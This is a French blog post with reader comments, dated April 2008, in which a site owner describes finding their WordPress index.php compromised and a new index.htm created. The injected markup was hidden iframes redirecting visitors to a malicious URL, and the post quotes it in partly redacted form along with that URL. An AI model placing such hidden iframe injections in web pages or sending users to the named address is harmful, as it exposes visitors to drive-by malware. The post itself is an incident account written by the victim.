http://olthart.com/imag/in.cgi
Dans la série « WP m’a tuer » que je croyais terminée, j’ai eu une mauvaise surprise. Ces pages sont restées inaccessibles pendant quelques jours. Faute de temps et de disponibilité je n’ai pu vérifier que ce soir ce qui s’était passé. Il s’agissait apparemment d’une attaque classique avec création et détournement d’une page index.htm à l’aide de deux iframe et détournement de la page index.php existante de Word-Press sur laquelle l’intrus a rajouté ces iframe pour détourner les visiteurs vers un site malveillant :
iframe [...code supprimé] src=’http://olthart.com/imag/in.cgi?2 ‘ [...code supprimé] width=’261′ height=’249′ style=’display:none’> iframe [...code supprimé] src=’http://olthart.com/imag/in.cgi?2 ‘ [...code supprimé] width=’5′ height=’304′ style=’display:none’> /iframe
Il va de soi que j’ai supprimé ce code malveillant avant de remettre en ligne la page index.php de WP.
Il reste à comprendre comment l’intrus est entré sur le serveur. Soit par le FTP, soit par l’entrée administrative de WordPress. Il est possible en effet de modifier le fichier index.php dans Word-Press, mais j’ignore comment dans ce cas il aurait créé le fichier index.htm
Tags: virus
avril 6th, 2008 at 4:37
Non seulement ce n’est pas fini, mais on dirait que ça recommence :
J’avais réparé le fichier index.php mercredi 3 avril et le lendemain c’était reparti !
avril 6th, 2008 at 4:39
J’avais déjà remarqué mercredi soir la présence d’un message d’erreur au-dessus des pages commentées :
Warning: Cannot modify header information – headers already sent by (output started at /mnt/124/free.fr/0/4/sarod/index.php:1) in /mnt/124/free.fr/0/4/sarod/wp-content/plugins/smart-unread-comments.php on line 83
avril 13th, 2008 at 1:51
[...] WP m’a tuer « http://olthart.com/imag/in.cgi [...]